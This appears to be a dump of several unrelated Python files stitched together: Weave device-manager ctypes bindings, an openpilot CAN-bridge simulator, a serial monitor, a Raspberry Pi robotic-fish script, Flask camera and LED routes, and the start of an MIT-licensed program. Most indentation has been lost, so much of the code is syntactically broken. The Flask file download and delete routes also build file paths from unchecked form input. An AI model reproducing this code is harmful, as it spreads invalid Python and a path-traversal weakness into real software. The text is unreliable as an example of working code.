self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.argtypes = [ c_void_p, c_char_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.argtypes = [ c_void_p, c_char_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ReconnectDevice.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ReconnectDevice.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.argtypes = [ c_void_p, c_uint16, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_IdentifyDevice.argtypes = [ c_void_p, _IdentifyDeviceCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_IdentifyDevice.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_PairToken.argtypes = [ c_void_p, c_void_p, c_uint32, _PairTokenCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_PairToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UnpairToken.argtypes = [ c_void_p, _UnpairTokenCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UnpairToken.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ScanNetworks.argtypes = [ c_void_p, c_int, _NetworkScanCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ScanNetworks.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetNetworks.argtypes = [ c_void_p, c_int, _GetNetworksCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetNetworks.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetCameraAuthData.argtypes = [ c_void_p, c_char_p, _GetCameraAuthDataCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetCameraAuthData.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_AddNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _AddNetworkCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_AddNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UpdateNetwork.argtypes = [ c_void_p, POINTER(_NetworkInfoStruct), _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UpdateNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RemoveNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RemoveNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_EnableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_EnableNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DisableNetwork.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_DisableNetwork.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.argtypes = [ c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_TestNetworkConnectivity.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetRendezvousMode.argtypes = [ c_void_p, _GetRendezvousModeCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetRendezvousMode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousMode.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousMode.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetLastNetworkProvisioningResult.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetWirelessRegulatoryConfig.argtypes = [ c_void_p, _GetWirelessRegulatoryConfigCompleteFunct, _ErrorFunct ]
            self._dmLib.nl_Weave_DeviceManager_GetWirelessRegulatoryConfig.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetWirelessRegulatoryConfig.argtypes = [ c_void_p, POINTER(_WirelessRegConfigStruct), _CompleteFunct, _ErrorFunct ]
            self._dmLib.nl_Weave_DeviceManager_SetWirelessRegulatoryConfig.restype = c_uint32
            self._dmLib.nl_Weave_DeviceManager_CreateFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
            self._dmLib.nl_Weave_DeviceManager_CreateFabric.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_LeaveFabric.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_LeaveFabric.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetFabricConfig.argtypes = [ c_void_p, _GetFabricConfigCompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_GetFabricConfig.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.argtypes = [ c_void_p, c_char_p, c_char_p ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_JoinExistingFabric.argtypes = [ c_void_p, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_JoinExistingFabric.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_Ping.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_Ping.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetConnectTimeout.argtypes = [ c_void_p, c_uint32 ]
self._dmLib.nl_Weave_DeviceManager_SetConnectTimeout.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetAutoReconnect.argtypes = [ c_void_p, c_bool ]
self._dmLib.nl_Weave_DeviceManager_SetAutoReconnect.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.argtypes = [ c_void_p, c_bool ]
self._dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.argtypes = [ c_void_p, c_uint64, c_char_p, c_void_p, c_uint32, c_void_p, c_uint32, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_RegisterServicePairAccount.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UpdateService.argtypes = [ c_void_p, c_uint64, c_void_p, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UpdateService.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_UnregisterService.argtypes = [ c_void_p, c_uint64, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_UnregisterService.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ArmFailSafe.argtypes = [ c_void_p, c_uint8, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ArmFailSafe.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_DisarmFailSafe.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_DisarmFailSafe.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_ResetConfig.argtypes = [ c_void_p, c_uint16, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_ResetConfig.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_GetLogFilter.argtypes = [ ]
self._dmLib.nl_Weave_DeviceManager_GetLogFilter.restype = c_uint8
self._dmLib.nl_Weave_DeviceManager_SetLogFilter.argtypes = [ c_uint8 ]
self._dmLib.nl_Weave_DeviceManager_SetLogFilter.restype = None
self._dmLib.nl_Weave_DeviceManager_CloseEndpoints.argtypes = [ ]
self._dmLib.nl_Weave_DeviceManager_CloseEndpoints.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_StartSystemTest.argtypes = [ c_void_p, c_uint32, c_uint32, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_StartSystemTest.restype = c_uint32
self._dmLib.nl_Weave_DeviceManager_StopSystemTest.argtypes = [ c_void_p, _CompleteFunct, _ErrorFunct ]
self._dmLib.nl_Weave_DeviceManager_StopSystemTest.restype = c_uint32
def NetworkTypeToString(val):
if (val == NetworkType_WiFi):
return "WiFi"
if (val == NetworkType_Thread):
return "Thread"
    if (val is not None):
return "UNKNOWN (" + str(val)+ ")"
return None
def ParseNetworkType(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "wifi"):
return NetworkType_WiFi
if (val == "thread"):
return NetworkType_Thread
raise Exception("Invalid network type: " + str(val))
def WiFiModeToString(val):
if (val == WiFiMode_AdHoc):
return "AdHoc"
if (val == WiFiMode_Managed):
return "Managed"
    if (val is not None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiMode(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "adhoc" or val == "ad-hoc"):
return WiFiMode_AdHoc
if (val == "managed"):
return WiFiMode_Managed
raise Exception("Invalid Wifi mode: " + str(val))
def WiFiRoleToString(val):
if (val == WiFiRole_Station):
return "Station"
if (val == WiFiRole_AccessPoint):
return "AccessPoint"
    if (val is not None):
return "Unknown (" + str(val)+ ")"
return None
def ParseWiFiRole(val):
if isinstance(val, six.integer_types):
return val
val = val.lower()
if (val == "station"):
return WiFiRole_Station
if (val == "accesspoint" or val == "access-point"):
return WiFiRole_AccessPoint
raise Exception("Invalid Wifi role: " + str(val))
def WiFiSecurityTypeToString(val):
if (val == WiFiSecurityType_None):
return "None"
if (val == WiFiSecurityType_WEP):
return "WEP"
if (val == WiFiSecurityType_WPAPersonal):
return "WPA"
if (val == WiFiSecurityType_WPA2Personal):
return "WPA2"
if (val == WiFiSecurityType_WPA2MixedPersonal):
return "WPA2Mixed"
if (val == WiFiSecurityType_WPAEnterprise):
return "WPAEnterprise"
if (val == WiFiSecurityType_WPA2Enterprise):
return "WPA2Enterprise"
if (val == WiFiSecurityType_WPA2MixedEnterprise):
return "WPA2MixedEnterprise"
if (val == WiFiSecurityType_WPA3Personal):
return "WPA3"
if (val == WiFiSecurityType_WPA3MixedPersonal):
return "WPA3Mixed"
if (val == WiFiSecurityType_WPA3Enterprise):
return "WPA3Enterprise"
if (val == WiFiSecurityType_WPA3MixedEnterprise):
return "WPA3MixedEnterprise"
    if (val is not None):
return "Unknown (" + str(val)+ ")"
return None
def ParseSecurityType(val):
val = val.lower()
if (val == 'none'):
return WiFiSecurityType_None
if (val == 'wep'):
return WiFiSecurityType_WEP
if (val == 'wpa' or val == 'wpapersonal' or val == 'wpa-personal'):
return WiFiSecurityType_WPAPersonal
if (val == 'wpa2' or val == 'wpa2personal' or val == 'wpa2-personal'):
return WiFiSecurityType_WPA2Personal
if (val == 'wpa3' or val == 'wpa3personal' or val == 'wpa3-personal'):
return WiFiSecurityType_WPA3Personal
if (val == 'wpa2mixed' or val == 'wpa2-mixed' or val == 'wpa2mixedpersonal' or val == 'wpa2-mixed-personal'):
return WiFiSecurityType_WPA2MixedPersonal
if (val == 'wpa3mixed' or val == 'wpa3-mixed' or val == 'wpa3mixedpersonal' or val == 'wpa3-mixed-personal'):
return WiFiSecurityType_WPA3MixedPersonal
if (val == 'wpaenterprise' or val == 'wpa-enterprise'):
return WiFiSecurityType_WPAEnterprise
if (val == 'wpa2enterprise' or val == 'wpa2-enterprise'):
return WiFiSecurityType_WPA2Enterprise
if (val == 'wpa3enterprise' or val == 'wpa3-enterprise'):
return WiFiSecurityType_WPA3Enterprise
if (val == 'wpa2mixedenterprise' or val == 'wpa2-mixed-enterprise'):
return WiFiSecurityType_WPA2MixedEnterprise
if (val == 'wpa3mixedenterprise' or val == 'wpa3-mixed-enterprise'):
return WiFiSecurityType_WPA3MixedEnterprise
raise Exception("Invalid Wifi security type: " + str(val))
def DeviceFeatureToString(val):
if (val == DeviceFeature_HomeAlarmLinkCapable):
return "HomeAlarmLinkCapable"
if (val == DeviceFeature_LinePowered):
return "LinePowered"
return "0x%08X" % (val)
def OperatingLocationToString(val):
if val == 1:
return 'unknown'
if val == 2:
return 'indoors'
if val == 3:
return 'outdoors'
raise Exception("Invalid operating location: " + str(val))
def ParseOperatingLocation(val):
val = val.lower()
if val == 'unknown':
return 1
if val == 'indoors':
return 2
if val == 'outdoors':
return 3
raise Exception("Invalid operating location: " + str(val))
|
can_bridge.py
|
#!/usr/bin/env python3
#pylint: skip-file
import os
import time
#import math
#import atexit
#import numpy as np
#import threading
#import random
import cereal.messaging as messaging
#import argparse
from common.params import Params
from common.realtime import Ratekeeper
from selfdrive.golden.can import can_function, sendcan_function
from selfdrive.car.honda.values import CruiseButtons
#import subprocess
import sys
import signal
import threading
from queue import Queue
from selfdrive.golden.keyboard_ctrl import keyboard_poll_thread, keyboard_shutdown
params = Params()
def shutdown():
global params
global pm
print('shutdown !')
keyboard_shutdown()
params.delete("CalibrationParams")
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': False,
'pandaType': "uno",
'controlsAllowed': True,
'safetyModel': "hondaNidec"
}
for seq in range(10):
pm.send('pandaState', dat)
time.sleep(0.1)
print ("exiting")
sys.exit(0)
def main():
global params
global pm
params.delete("Offroad_ConnectivityNeeded")
params.delete("CalibrationParams")
params.put("CalibrationParams", '{"calib_radians": [0,0,0], "valid_blocks": 20}')
os.system('rm /tmp/op_git_updated')
os.system('touch /tmp/op_simulation')
start_loggerd = False
if len(sys.argv) > 1:
start_loggerd = (sys.argv[1] == '1')
print ('start_loggerd=', start_loggerd)
if start_loggerd:
os.system('cd /data/openpilot/; ./selfdrive/loggerd/loggerd &')
os.system('echo 1 > /tmp/force_calibration')
# make volume 0
os.system('service call audio 3 i32 3 i32 0 i32 1')
q = Queue()
t = threading.Thread(target=keyboard_poll_thread, args=[q])
t.start()
pm = messaging.PubMaster(['can', 'pandaState'])
# can loop
sendcan = messaging.sub_sock('sendcan')
rk = Ratekeeper(100, print_delay_threshold=None)
steer_angle = 0.0
speed = 50.0 / 3.6
cruise_button = 0
btn_list = []
btn_hold_times = 2
frames = 0
while 1:
# check keyboard input
if not q.empty():
message = q.get()
print (message)
if (message == 'quit'):
shutdown()
return
m = message.split('_')
if m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
if len(btn_list) == 0:
for x in range(btn_hold_times):
btn_list.append(cruise_button)
if m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
if len(btn_list) == 0:
for x in range(btn_hold_times):
btn_list.append(cruise_button)
if m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
if len(btn_list) == 0:
for x in range(btn_hold_times):
btn_list.append(cruise_button)
btn = 0
if len(btn_list) > 0:
btn = btn_list[0]
btn_list.pop(0)
# print ('cruise_button=', cruise_button)
can_function(pm, speed * 3.6, steer_angle, rk.frame, cruise_button=btn, is_engaged=1)
if rk.frame%5 == 0:
throttle, brake, steer = sendcan_function(sendcan)
steer_angle += steer/10000.0 # torque
#print(speed * 3.6, steer, throttle, brake)
if frames % 20 == 0:
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "uno",
'controlsAllowed': True,
'safetyModel': "hondaNidec",
'fanSpeedRpm' : 1000
}
pm.send('pandaState', dat)
frames += 1
rk.keep_time()
shutdown()
def signal_handler(sig, frame):
print('You pressed Ctrl+C!')
shutdown()
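# Assumption: keyboard_poll_thread puts underscore-separated command strings on
# the queue, matching the parsing in main() above, e.g. "cruise_up",
# "cruise_down", "cruise_cancel", or "quit".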
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal_handler)
print (sys.argv)
print ("input 1 to curse resume/+")
print ("input 2 to curse set/-")
print ("input 3 to curse cancel")
print ("input q to quit")
main()
|
SystemMonitor.py
|
# List available serial ports
import sys
import glob
import threading
import time
import serial
from Parsing import Data
import numpy as np # NumPy (multidimensional arrays, linear algebra, ...)
import matplotlib as mpl # Matplotlib (2D/3D plotting library)
#import matplotlib.pyplot as plt # Matplotlib's pyplot: MATLAB-like syntax
from pylab import * # Matplotlib's pylab interface
# from colour import Color
# def colourRange(n):
# blue = Color('blue')
# return list(blue.range_to(Color("green"),n))
#
# def plotCalibrationPulseWidths(data, legend):
# colours = colourRange(len(data))
# ion()
#
# for d in data:
# plt.hist(d.BL1, bins = 80, normed=False, color=colours.pop().hex_l)
# plt.legend(legend)
# plt.xlabel("Length of pulses (us)")
# plt.ylabel("Count")
# plt.title("Pulse Width Distribution for Calibration Pulses")
# plt.show
def serial_ports():
"""List serial port names.
raises EnvironmentError:
On unsupported or unknown platforms
returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
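# Illustrative call (results depend on the host):
#   >>> serial_ports()
#   ['/dev/ttyUSB0', '/dev/ttyACM0']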
collectData = False
def readSerialData():
while True:
if collectData:
line = ser.readline().rstrip() # read data from serial
Data.readLine(line, data)
if __name__ == '__main__':
myPorts = serial_ports()
for i in range(len(myPorts)):
print "port", i, ": ", myPorts[i]
    portNumber = int(raw_input("\nEnter port number: "))
myPort = myPorts[portNumber] if (0 <= portNumber < len(myPorts)) else None
print "Opening serial port ", myPort
# Read from serial
ser = serial.Serial(myPort, 115200)
data = []
serialThread = threading.Thread(target=readSerialData)
serialThread.start()
    def getDurationFromUser():
global collectData
collectData = False
time.sleep(0.1)
#if data:
# plotData(data)
        userEntry = raw_input("\nCapture for duration (zero for indefinite): ")
try:
duration = int(userEntry)
if duration > 0:
Data.readLine('N,' + str(duration) + ',', data)
                collectTimer = threading.Timer(duration, getDurationFromUser)
collectTimer.start()
collectData = True
elif duration == 0:
Data.readLine('N,' + str(duration) + ',', data)
collectData = True
raw_input("\nPress enter to stop.")
sys.exit()
except ValueError:
sys.exit()
    getDurationFromUser()
|
exp_cameraman.py
|
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import os
import time
import threading
import numpy as np
from picamera import PiCamera
from lib_utils import *
from lib_depthsensor import DepthSensor
from lib_fin import Fin
os.makedirs('./data/{}/'.format(U_FILENAME))
class Video():
picam = PiCamera()
picam.resolution = (1296, 972) # max values, have to be 4:3
picam.rotation = 180
CAMLED = 40
GPIO.setup(CAMLED, GPIO.OUT)
GPIO.output(CAMLED, U_CAM_RIGHT) # set to right cam
def start(self):
self.picam.start_recording('./data/{}/video.h264'.format(U_FILENAME))
def stop(self):
self.picam.stop_recording()
def initialize():
"""Initializes all threads which are running fins and a logger instance for the overall status
"""
threading.Thread(target=caudal.run).start()
threading.Thread(target=dorsal.run).start()
threading.Thread(target=pecto_l.run).start()
threading.Thread(target=pecto_r.run).start()
threading.Thread(target=video.start).start()
def terminate():
"""Terminates all threads which are running fins
"""
caudal.terminate()
dorsal.terminate()
pecto_l.terminate()
pecto_r.terminate()
video.stop()
GPIO.cleanup()
def depth_ctrl_from_depthsensor(target_depth):
"""Controls the diving depth to a preset level
Args:
thresh (int, optional): Threshold below which dorsal fin is not controlled, [mm]
"""
thresh = 2
depth_sensor.update()
depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779)
if depth_mm > (target_depth + thresh):
dorsal.off()
elif depth_mm < (target_depth - thresh):
dorsal.on()
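# This is simple bang-bang depth control: the dorsal fin only toggles outside a
# +/- thresh [mm] dead band around target_depth, avoiding rapid on/off chatter
# near the setpoint.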
def main(run_time=60):
while (time.time() - t_start) < run_time:
depth_ctrl_from_depthsensor(250)
# move forward
if 0 < (time.time() - t_start) < 10:
caudal.on()
# turn right
elif 10 < (time.time() - t_start) < 20:
caudal.off()
pecto_l.on()
# move forward
elif 20 < (time.time() - t_start) < 30:
pecto_l.off()
caudal.on()
# move backward
elif 30 < (time.time() - t_start) < 40:
caudal.off()
pecto_r.on()
pecto_l.on()
# turn left
elif 40 < (time.time() - t_start) < 50:
pecto_l.off()
# move forward
elif 50 < (time.time() - t_start) < 60:
pecto_r.off()
caudal.on()
caudal = Fin(U_FIN_C1, U_FIN_C2, 2) # freq, [Hz]
dorsal = Fin(U_FIN_D1, U_FIN_D2, 6) # freq, [Hz]
pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 3) # freq, [Hz]
pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 3) # freq, [Hz]
video = Video()
depth_sensor = DepthSensor()
depth_sensor.update()
surface_pressure = depth_sensor.pressure_mbar
initialize()
t_start = time.time()
main(60)
terminate()
|
views.py
|
from flask import Flask, render_template, Response, request, redirect, url_for, send_file
# from ..url_for2 import url_for2
from flask_login import login_required, current_user
import cv2
import datetime, time
import os, sys
import numpy as np
from threading import Thread
from . import cam
from itertools import count
import glob, re
gpio_ok = True
try:
import RPi.GPIO as GPIO
except:
gpio_ok = False
if gpio_ok:
print('GPIO support OK!')
else:
print('WARNING: GPIO in failsafe mode')
capture = False
grey = False
neg = False
camera_on = False
rec = False
verbose = True
# LEDs state
leds_status = [False, False, False, False]
led_labels = { 'led1' : 0, 'led2' : 1, 'led3' : 2, 'led4' : 3}
gpio_led1 = 18
gpio_led2 = 23
gpio_led3 = 24
gpio_led4 = 25
gpio_pins = [gpio_led1, gpio_led2, gpio_led3, gpio_led4]
camera_device = 0
if gpio_ok:
# Set up GPIO pins
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
for pin in gpio_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin,0)
def led_set(led, on):
if verbose:
print(f'led_set: LED{led + 1} ' + ('ON' if on else 'OFF'))
leds_status[led] = True if on else False
if gpio_ok:
GPIO.output(gpio_pins[led], on)
# not used anywhere
def turn_leds_off():
for led in range(4):
led_set(led, 0)
# not used anywhere
def turn_leds_on():
for led in range(4):
led_set(led, leds_status[led])
#make shots directory to save pics
try:
os.mkdir('./shots')
except OSError as error:
pass
#make videos directory to save videos
try:
os.mkdir('./videos')
except OSError as error:
pass
def cam_record():
global rec, rec_frame, rec_status, camera, camera_on
rec = True
    print('Opening VideoCapture inside the thread')
if not camera_on:
camera = cv2.VideoCapture(camera_device)
# Check if camera opened successfully
while not camera.isOpened():
print(f'Unable to read camera feed camera={camera}')
if not rec:
# cv2.destroyAllWindows()
return
# get a valid frame to determine properties
for i in count(1):
print(f'Trying to read (i={i})...')
ret, _ = camera.read()
if ret:
break
if not rec:
return
    # Default resolutions of the frame are obtained. The default resolutions are system dependent.
# We convert the resolutions from float to integer.
frame_width = int(camera.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(camera.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_rate = int(camera.get(cv2.CAP_PROP_FPS))
print(f'frame_rate={frame_rate}, frame_width={frame_width}, frame_height={frame_height}')
    # Define the codec and create the VideoWriter object. The output is stored
    # as a timestamped .avi file under 'videos/'.
now = datetime.datetime.now()
out = cv2.VideoWriter('videos/vid_{}.avi'.format(str(now).replace(":",'')), cv2.VideoWriter_fourcc('M','J','P','G'), 20, (frame_width, frame_height))
while True:
rec_status, rec_frame = camera.read()
if rec_status:
# Write the frame into the file 'output.avi'
out.write(rec_frame)
if not rec:
break
# When everything is done, release the video capture and video write objects
if not camera_on:
camera.release()
out.release()
def gen_frames(): # generate frame by frame from camera
global out, capture, rec_frame
while rec or camera_on:
if not rec:
success, frame = camera.read()
if success:
if grey:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if neg:
frame = cv2.bitwise_not(frame)
if capture:
capture = False
now = datetime.datetime.now()
p = os.path.sep.join(['shots', "shot_{}.png".format(str(now).replace(":",''))])
cv2.imwrite(p, frame)
try:
_, buffer = cv2.imencode('.jpg', cv2.flip(frame,1))
frame = buffer.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
except Exception as e:
pass
else:
try:
_, buffer = cv2.imencode('.jpg', rec_frame)
frame = buffer.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
except Exception as e:
pass
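# Each yielded chunk is one part of a multipart/x-mixed-replace response: the
# browser redraws the image at every "--frame" boundary, which is what makes
# the MJPEG feed served by video_feed() below appear live.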
@cam.route('/camera')
@login_required
def index():
global camera_on, neg, grey, rec, leds_status
return render_template('camera/camera.html', camera_on = camera_on, neg = neg, grey = grey, rec = rec, led1 = leds_status[0], led2 = leds_status[1], led3 = leds_status[2], led4 = leds_status[3])
@cam.route('/video_feed')
@login_required
def video_feed():
if camera_on or rec:
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
else:
return redirect(url_for('.index'))
@cam.route('/cam_requests',methods=['POST','GET'])
@login_required
def tasks():
global camera_on,camera, capture, grey, neg, rec
print('Entering cam_requests')
if request.method == 'POST':
if request.form.get('click'):
capture = True
elif request.form.get('color'):
grey = False
elif request.form.get('grey'):
grey = True
elif request.form.get('pos'):
neg = False
elif request.form.get('neg'):
neg = True
elif request.form.get('start'):
if not camera_on and not rec:
camera = cv2.VideoCapture(camera_device)
camera_on = True
elif request.form.get('stop'):
if camera_on and not rec:
camera.release()
camera_on = False
elif request.form.get('rec_start'):
if not rec:
#Start new thread for recording the video
th = Thread(target = cam_record)
th.start()
time.sleep(1)
elif request.form.get('rec_stop'):
if rec:
rec = False
time.sleep(1)
print('Leaving cam_requests')
return redirect(url_for('.index'))
@cam.route('/tabela',methods=['POST','GET'])
def tabela():
return render_template('camera/tabela.html')
@cam.route('/files',methods=['POST','GET'])
@login_required
def files():
fns = glob.glob('videos/*.avi')
    if fns:
        fns = list(map(os.path.basename, fns))
        dates = list(map(lambda x: re.search(r'[0-9]+-[0-9]+-[0-9]+', x).group(0), fns))
        times = list(map(lambda x: re.search(r' [0-9]+\.[0-9]+\.avi$', x).group(0).lstrip()[:-4], fns))
d = list(map(lambda x, y, z: list([x, y, z]), fns, dates, times))
else:
d = []
return render_template('camera/files.html', data = d)
@cam.route('/file_action',methods=['POST'])
@login_required
def file_action():
if request.form.get('download'):
print('download')
fn = 'vid_{} {}.avi'.format(request.form.get('date'), request.form.get('time'))
print(f'fn={fn} getenv("PWD")={os.getenv("PWD")}')
try:
return send_file('../videos/' + fn)
except Exception as e:
print(str(e))
if request.form.get('erase'):
fn = 'videos/vid_{} {}.avi'.format(request.form.get('date'), request.form.get('time'))
print('erase')
print(f'fn={fn}')
os.unlink(fn)
return redirect(url_for('cam.files'))
@cam.route('/set_led/<string:led>/<int:on>', methods=['GET'])
@login_required
def set_led(led, on):
n = led_labels[led]
led_set(n, on)
return str(on)
@cam.route('/get_led/<string:led>', methods=['GET'])
@login_required
def get_led(led):
    n = led_labels[led]
    return '1' if leds_status[n] else '0'
@cam.route('/set_leds', methods = ['POST'])
@login_required
def set_leds():
for led in led_labels:
if request.form.get(led):
led_set(led_labels[led], 1)
else:
led_set(led_labels[led], 0)
return redirect(url_for('cam.index'))
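# Illustrative client calls for the LED endpoints above (hypothetical host):
#   curl http://<host>/set_led/led1/1   # turn LED1 on, returns "1"
#   curl http://<host>/get_led/led1     # returns "1" or "0"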
|
__main__.py
|
#!/usr/bin/env python3
"""
The MIT License
Copyright (c) 2019 Kyle Christensen
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import os
import signal
import sys
import threading
from configparser import ConfigParser
from datetime import datetime
from time import sleep, strftime, time
import paho.mqtt.client as mqtt_client
import requests
from crontab import CronTab
from dateutil.tz import tzlocal
